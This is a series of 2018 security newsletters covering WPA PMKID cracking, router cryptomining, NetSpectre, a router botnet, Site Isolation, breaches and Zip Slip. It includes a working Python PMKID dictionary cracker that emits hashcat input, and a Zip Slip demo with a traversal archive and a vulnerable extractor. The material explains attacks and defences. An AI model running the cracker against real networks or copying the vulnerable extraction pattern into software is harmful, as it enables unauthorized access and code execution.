BF-SIRT Newsletter 2018-32

A new method has been found to make cracking WPA/WPA2 easier

The makers of Hashcat have found a simpler way to obtain the Pairwise Master Key Identifier (PMKID) from a WPA/WPA2-secured Wi-Fi network. Before this method was discovered an attacker had to wait for a user to authenticate and then capture that user's 4-way handshake. The new method is a “client-less attack”: the access point itself sends the PMKID, in the RSN information element of the first EAPOL frame, as soon as anyone tries to associate, so the attacker can collect everything needed for an offline crack without any legitimate user being on the network. This can significantly speed up the process of obtaining crackable material, since there is no longer any waiting for clients.

The good news is that the password still has to be recovered by brute force or a dictionary attack against the captured PMKID, so if you are using a long, random passphrase this remains a non-trivial (in practice infeasible) process. The method also only works against networks using a Pre-Shared Key (PSK); WPA/WPA2-Enterprise networks that authenticate users via 802.1X have no shared passphrase to crack and are not affected.
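To make the cracking step concrete, here is an added example in Python (not code from the Hashcat team or from the original newsletter) that implements the two derivations involved, as specified in IEEE 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations) and PMKID = HMAC-SHA1-128(PMK, "PMK Name" || MAC_AP || MAC_STA). The SSID, MAC addresses and wordlist are constructed for the example, and the “captured” PMKID is derived from a known passphrase to stand in for the value an attacker reads from the AP's first EAPOL frame. It also formats the capture the way hashcat's -m 16800 mode expects it. Because the only client-side input is the client MAC address, which the attacker's own card supplies, no legitimate user is needed; but every candidate passphrase still costs 4096 HMAC-SHA1 iterations, which is why a strong passphrase remains a real defence.

```python
import hashlib
import hmac
from typing import Iterable, Optional

# Constructed example values (not a real network or capture).
SSID = "CorpGuest"
AP_MAC = bytes.fromhex("001122aabbcc")   # authenticator address (AA), i.e. the AP
STA_MAC = bytes.fromhex("66778899ddee")  # supplicant address (SPA), i.e. the attacker's card
WORDLIST = ["password", "CorpGuest2017", "Summer2018!", "letmein"]


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    This is the expensive step that every cracking candidate has to pay for."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), 4096, 32)


def derive_pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    """IEEE 802.11i: PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AA || SPA).
    No nonces and no handshake traffic: only the PMK and the two MAC addresses."""
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def hashcat_16800_line(pmkid: bytes, ap_mac: bytes, sta_mac: bytes, ssid: str) -> str:
    """Format a capture the way hashcat -m 16800 (WPA-PMKID-PBKDF2) reads it:
    PMKID*MAC_AP*MAC_STA*ESSID-as-hex."""
    return "*".join([pmkid.hex(), ap_mac.hex(), sta_mac.hex(), ssid.encode("utf-8").hex()])


def crack_pmkid(target_pmkid: bytes, ssid: str, ap_mac: bytes, sta_mac: bytes,
                candidates: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack: recompute the PMKID for each candidate passphrase
    and compare it with the captured one. Returns the passphrase, or None if the
    wordlist does not contain it."""
    for candidate in candidates:
        pmk = derive_pmk(candidate, ssid)
        if hmac.compare_digest(derive_pmkid(pmk, ap_mac, sta_mac), target_pmkid):
            return candidate
    return None


# Constructed "capture": in a real attack this value is read from the RSN IE of the
# first EAPOL frame the AP sends after the attacker associates; here it is derived
# from a known passphrase so the example runs offline.
CAPTURED_PMKID = derive_pmkid(derive_pmk("Summer2018!", SSID), AP_MAC, STA_MAC)

if __name__ == "__main__":
    print("hashcat -m 16800 line:", hashcat_16800_line(CAPTURED_PMKID, AP_MAC, STA_MAC, SSID))
    print("recovered passphrase:", crack_pmkid(CAPTURED_PMKID, SSID, AP_MAC, STA_MAC, WORDLIST))
```

The PBKDF2 step can be checked against the IEEE 802.11i test vector (passphrase "password", SSID "IEEE" gives a PMK starting f42c6fc5...), and the 4096-iteration cost per guess is exactly what a long random passphrase multiplies into an infeasible search.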

Top 5 Security links

BF-SIRT Newsletter 2018-31

Huge Cryptomining Attack on ISP-Grade Routers Spreads Globally

Carrier-grade MikroTik routers are injecting the attacker's Coinhive cryptomining script into potentially millions of web pages a day.

A massive hacking campaign has been uncovered, compromising tens of thousands of MikroTik routers to embed Coinhive scripts in websites using a known vulnerability.

So far, Censys.io has reported more than 170,000 active MikroTik devices infected with the Coinhive site-key used in this campaign (the site-key is the same across infections, indicating a single entity behind the attacks). The campaign is mainly targeting Brazil – but infections are growing internationally, according to Trustwave’s Secure Web Gateway (SWG) team, indicating much larger ambitions.

“This is a warning call and reminder to everyone who has a MikroTik device to patch as soon as possible,” Trustwave researcher Simon Kenin wrote in a blog post. “This attack may currently be prevalent in Brazil, but during the final stages of writing this blog, I also noticed other geo-locations being affected as well, so I believe this attack is intended to be on a global scale.”

Top 5 Security Links

How to defend yourself against SamSam ransomware

Backdoors keep appearing in Cisco’s routers

Reddit breach highlights limits of SMS-based authentication

Attacks on industrial enterprises using RMS and Teamviewer

Amnesty International targeted by Nation-state spyware

BF-SIRT Newsletter 2018-30

New Spectre attack enables secrets to be leaked over a network

In a paper named “NetSpectre: Read Arbitrary Memory over Network” researchers from Graz University of Technology, including one of the original Meltdown discoverers, Daniel Gruss, have described NetSpectre: a fully remote attack based on Spectre. With NetSpectre, an attacker can remotely read the memory of a victim system without running any code on that system.

The major catch is that this side channel is slow: the researchers measured roughly 15 bits per hour using a cache-based covert channel and 60 bits per hour using an AVX-based one, so it could take days to locate and extract privileged information such as an encryption key or authentication token.

Intel has issued a statement saying: “NetSpectre is an application of Bounds Check Bypass (CVE-2017-5753), and is mitigated in the same manner – through code inspection and modification of software to ensure a speculation stopping barrier is in place where appropriate. We provide guidance for developers in our whitepaper, Analyzing Potential Bounds Check Bypass Vulnerabilities, which has been updated to incorporate this method. We are thankful to Michael Schwarz, Daniel Gruss, Martin Schwarzl, Moritz Lipp, & Stefan Mangard of Graz University of Technology for reporting their research.”

Top 5 Security Links

LifeLock Bug Exposed Millions of Customer Email Addresses

Google hasn’t suffered an employee phishing compromise in over a year

DHS – Russian APT groups are inside US critical infrastructure

Attacks on Oracle WebLogic Servers Detected After Publication of PoC Code

Adopting a Zero Trust approach is the best strategy to control access
(Blogpost image by Ildefonso Polo under “Do whatever you want”-license by Unsplash)

BF-SIRT Newsletter 2018-28

Botnet built with one exploit only

A malware author has built a huge botnet of over 18,000 routers in the span of only one day.

This new botnet has been spotted this week by security researchers from NewSky Security, and their findings have been confirmed by Qihoo 360 Netlab, Rapid7, and Greynoise.

The botnet has been built by exploiting a vulnerability in Huawei HG532 routers, tracked as CVE-2017-17215.

Botnet author is a known threat actor

The botnet herder identified himself with the pseudonym “Anarchy.” Answering inquiries from both NewSky Security researcher Ankit Anubhav and Bleeping Computer, Anarchy did not give a reason for building the botnet.

But Anubhav believes Anarchy may actually be the hacker who previously went by Wicked, whom Anubhav interviewed on NewSky’s blog and whom Fortinet featured in a report.

But the real problem here is not a malware author doing what he does best. The problem is the relative ease with which Anarchy built a gigantic botnet within one day.

He didn’t do it with a zero-day or some vulnerability that had not been exploited before. He did so with a high-profile vulnerability that many botnets have exploited before.

Top 5 Security links

Public By Default: What Venmo (and the Whole World) Knows About You

Microsoft Identity Bounty Program Pays $500 to $100,000 for Bugs

Sextortion scam knows your password, but don’t fall for it

Director of National Intelligence warns of devastating cyber threat to US infrastructure

Google User Content CDN Used for Malware Hosting

BF-SIRT Newsletter 2018-27

Chrome Now Features Site Isolation to Defend Against Spectre

A new feature called site isolation is being tapped to protect Chrome users against Spectre.

Google introduced new security mitigations for its Chrome browser to defend against recently discovered Spectre variants.

The new security feature, called Site Isolation, renders content from different websites in separate renderer processes, so a page from one site never shares a process (and therefore an address space) with documents from another site, regardless of which tab or frame they are loaded in. A Spectre-style read of a renderer’s memory therefore cannot reach another site’s data. It has now been rolled out to most users of Chrome 67, released in May, on Windows, Mac, Linux and Chrome OS, Google said.

“Speculative execution side-channel attacks like Spectre are a newly discovered security risk for web browsers,” said Google software engineer Charlie Reis in a Wednesday post. “A website could use such attacks to steal data or login information from other websites that are open in the browser.”

Site Isolation is nothing new. It’s been optionally available as an experimental enterprise policy since Chrome 63 for customers. But, said Reis, many known issues have been resolved since then, making it practical to enable by default for all desktop Chrome users.

On Tuesday, more Spectre variants were disclosed, dubbed Spectre 1.1 and Spectre 1.2. Both are sub-variants of Spectre Variant 1 (bounds check bypass): 1.1 uses speculative stores to overwrite buffers, and 1.2 shows that speculative stores can also bypass read-only protections on CPUs that do not enforce them during speculation.

Top 5 Security links

Default router password leads to spilled military secrets
The next generation of Wi-Fi security will save you from yourself
Update Flash (and Adobe Acrobat) NOW!
Thermanator attack steals passwords by reading thermal residue on keyboards
Stolen D-Link certificate used to digitally sign spying malware

Photo by Charles Deluvio 🇵🇭🇨🇦 on Unsplash

BF-SIRT Newsletter 2018-26

Gentoo shows off prompt and professional security response after minor breach

A weak administrator password allowed an unknown attacker to gain access to the Gentoo Linux distribution’s GitHub account and lock developers out of it. The GitHub repositories of Gentoo are only downstream mirrors of the self-hosted Gentoo.org infrastructure, so the canonical source tree was not affected.

From an organizational standpoint, Gentoo’s handling of the incident was prompt and professional: it published official statements promptly, detailing the nature of the breach and what was and was not affected. This should be considered the standard against which organizations are judged for handling security breaches.

Top 5 Security links

Programmer tried to sell cyberweapon on dark web for $50M: Reminder to secure employees
Gartner Identifies the Top Six Security and Risk Management Trends
UK Banks Told To Show Their Backup Plans For Tech Shutdowns
Google tries to calm controversy over app developers having access to your Gmail
Why LTE and 5G networks could be affected by these new security vulnerabilities

(Blogpost image by Charles Deluvio 🇵🇭🇨🇦, “Front-End Development“, “Do whatever you want”-license by Unsplash)

BF-SIRT Newsletter 2018-25

Ticketmaster chat feature leads to Credit-Card Breach

Tens of thousands of people have been caught up in a data breach at Ticketmaster UK, which exposed credit-card and personal information for UK and some international customers.

The ticket-selling giant said that on Saturday it found malware within a customer chat function for its websites, hosted by Inbenta Technologies. Worryingly, the malicious code was found to be accessing an array of information, including name, address, email address, telephone number, payment details and Ticketmaster login details.

The malware managed to stay under the radar for months as well, Ticketmaster said. The breach affects those who purchased, or attempted to purchase, event tickets between September 2017 and June 23 of this year. About 5 percent of its customer base is affected, the company noted, which according to the BBC’s calculations works out to 40,000 or so victims.

Ticketmaster has since disabled the feature, which was running on Ticketmaster International, Ticketmaster UK, GETMEIN! and TicketWeb websites. It also said in a website notice that “forensic teams and security experts are working around the clock to understand how the data was compromised,” and said that it has notified the affected customers.

Top 5 Security links

Top 10 most abused top level domains
Google to Fix Location data leak in Google Home, Chromecast
Marketing firm Exactis leaked a personal info database with 340 million records
Botnets evolving to mobile devices
Announcing STARTTLS Everywhere: Securing hop-to-hop email delivery

BF-SIRT Newsletter 2018-24

Launching VirusTotal Monitor, a service to mitigate false positives

A new service from VirusTotal lets software developers privately check and continuously monitor their application binaries against antivirus engines, in a bid to reduce false positives.

VirusTotal announced the Monitor service on June 19. Since the site was founded in 2004, VirusTotal has let developers and antivirus vendors check files against its malware-detection engines; with VirusTotal (VT) Monitor, developers get a private system where they upload new builds and have them continuously re-scanned to see whether any engine flags them as malware, so that a false positive can be raised with the vendor before it reaches users.

Top 5 Security links

“Huge” Browser Bug Enabled Malicious Websites to Retrieve Data from Other Sites You Visited
New North Korea Cyberattack Launches
Sneaky Web Tracking Technique Under Heavy Scrutiny by GDPR
New phishing scam reels in Netflix users to TLS-certified sites
Android Gets New Anti-Spoofing Feature to Make Biometric Authentication Secure

BF-SIRT Newsletter 2018-23

New Vulnerability Found in All Modern Intel CPUs

Another security vulnerability has been discovered in Intel chips that affects the processor’s speculative execution technology. Dubbed Lazy FP State Restore, the vulnerability (CVE-2018-3665) within Intel Core and Xeon processors has just been confirmed by Intel, and vendors are now rushing to roll out security updates in order to fix the flaw.

Unlike Meltdown and Spectre, this flaw needs no new microcode: it stems from operating systems and hypervisors “lazily” saving and restoring the floating-point (FPU/SSE/AVX) register state on context switches, which lets a process speculatively read register contents left behind by another process (for example, AES key material held in AVX registers). The fix is therefore an operating-system or hypervisor update that restores the register state eagerly, and vendors are rolling those out now. As always, keep your software up to date.

Top 5 Security links

Startup Working on Contentious Pentagon AI Project Was Hacked
Tens of Thousands of Android Devices Are Exposing Their Debug Port
Citation needed: Europe claims Kaspersky wares ‘confirmed as malicious’
Feds Bust Dozens of Email Scammers, but Your Inbox Still Isn’t Safe
What got breached this week? Ticket portals, DNA sites, and Atlanta’s police cameras

(Blogpost image by Alexandru-Bogdan Ghita, “CPU in Socket”, “Do whatever you want”-license by Unsplash)

BF-SIRT Newsletter 2018-22

Public Disclosure of a Critical Arbitrary File Overwrite Vulnerability: Zip Slip

The Snyk Security team is today announcing the public disclosure of a critical arbitrary file overwrite vulnerability called Zip Slip. It is a widespread vulnerability which typically results in remote command execution. The vulnerability affects thousands of projects, including ones from HP, Amazon, Apache, Pivotal and many others. It has been found in multiple ecosystems, including JavaScript, Ruby, .NET and Go, but is especially prevalent in Java. Of course, this type of vulnerability has existed before, but recently it has manifested itself in a much larger number of projects and libraries.

Zip Slip is exploited using a specially crafted archive whose entry names contain directory-traversal sequences (e.g. ../../evil.sh). Extraction code that concatenates the entry name onto the destination directory without validating the resulting path writes the file outside that directory; if the attacker can overwrite an executable, a startup script or a configuration file that is later run, this becomes code execution. The vulnerability can affect numerous archive formats, including tar, jar, war, cpio, apk, rar and 7z.
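As an added illustration (not Snyk’s code, nor code from any affected project), the following Python shows the vulnerable extraction pattern next to a hardened one. The archive is constructed in memory with an entry named ../../evil.sh, and the demo extracts into a scratch directory tree so nothing escapes the temporary directory. CPython’s own ZipFile.extractall() strips traversal components, so in Python the bug lives in hand-rolled extractors like the one below; libraries in other ecosystems (Java’s java.util.zip, for instance) hand back the raw entry name, and the same canonicalise-and-compare check is needed there.

```python
import io
import os
import tempfile
import zipfile


def build_malicious_zip() -> bytes:
    """Constructed sample archive: one benign entry and one whose name walks out of
    the extraction directory (the Zip Slip payload)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("docs/readme.txt", "harmless\n")
        zf.writestr("../../evil.sh", "#!/bin/sh\necho pwned\n")
    return buf.getvalue()


def extract_vulnerable(data: bytes, dest: str) -> list:
    """The Zip Slip pattern: the entry name is joined onto dest and written as-is."""
    written = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            target = os.path.join(dest, info.filename)  # "../" in the name escapes dest
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with zf.open(info) as src, open(target, "wb") as dst:
                dst.write(src.read())
            written.append(os.path.normpath(target))
    return written


def extract_safe(data: bytes, dest: str) -> list:
    """Hardened: canonicalise every target path and refuse the whole archive if any
    entry resolves outside dest. All names are validated before anything is written,
    so a malicious archive leaves no partial extraction behind."""
    root = os.path.realpath(dest)
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        targets = []
        for info in zf.infolist():
            target = os.path.realpath(os.path.join(root, info.filename))
            # commonpath() also rejects absolute entry names such as /etc/passwd
            if os.path.commonpath([root, target]) != root:
                raise ValueError(f"Zip Slip: entry {info.filename!r} resolves outside {root}")
            targets.append((info, target))
        written = []
        for info, target in targets:
            if info.is_dir():
                os.makedirs(target, exist_ok=True)
                continue
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with zf.open(info) as src, open(target, "wb") as dst:
                dst.write(src.read())
            written.append(target)
    return written


def demo() -> dict:
    """Run both extractors against the malicious archive inside a scratch tree and
    report what happened."""
    data = build_malicious_zip()
    observations = {}
    with tempfile.TemporaryDirectory() as tmp:
        # dest sits two levels below tmp, so "../../evil.sh" lands in tmp/a, not beyond tmp
        dest = os.path.join(tmp, "a", "b", "dest")
        os.makedirs(dest)
        root = os.path.realpath(dest)
        paths = extract_vulnerable(data, dest)
        observations["vulnerable_escaped"] = any(
            os.path.commonpath([root, os.path.realpath(p)]) != root for p in paths)
        observations["evil_sh_exists"] = os.path.exists(os.path.join(tmp, "a", "evil.sh"))

        dest2 = os.path.join(tmp, "safe")
        os.makedirs(dest2)
        try:
            extract_safe(data, dest2)
            observations["safe_rejected"] = False
        except ValueError:
            observations["safe_rejected"] = True
        observations["safe_wrote_nothing"] = os.listdir(dest2) == []

        benign = io.BytesIO()  # a clean archive must still extract normally
        with zipfile.ZipFile(benign, "w") as zf:
            zf.writestr("docs/readme.txt", "harmless\n")
        dest3 = os.path.join(tmp, "benign")
        os.makedirs(dest3)
        observations["safe_benign_ok"] = len(extract_safe(benign.getvalue(), dest3)) == 1
    return observations


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The important design choice is the two-pass structure in extract_safe: string checks such as rejecting names that start with ".." miss variants like "docs/../../evil.sh", whereas comparing the canonicalised path against the canonicalised root catches every form, and validating before writing means a hostile archive is rejected as a whole rather than half-extracted.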

Top 5 Security links

Another flash update
Shipping industry cybersecurity: A shipwreck waiting to happen
Widespread Google groups misconfiguration exposes sensitive information
Destructive and MiTM capabilities of VPNFilter Malware revealed
When cybercriminals are rubbish at cybersecurity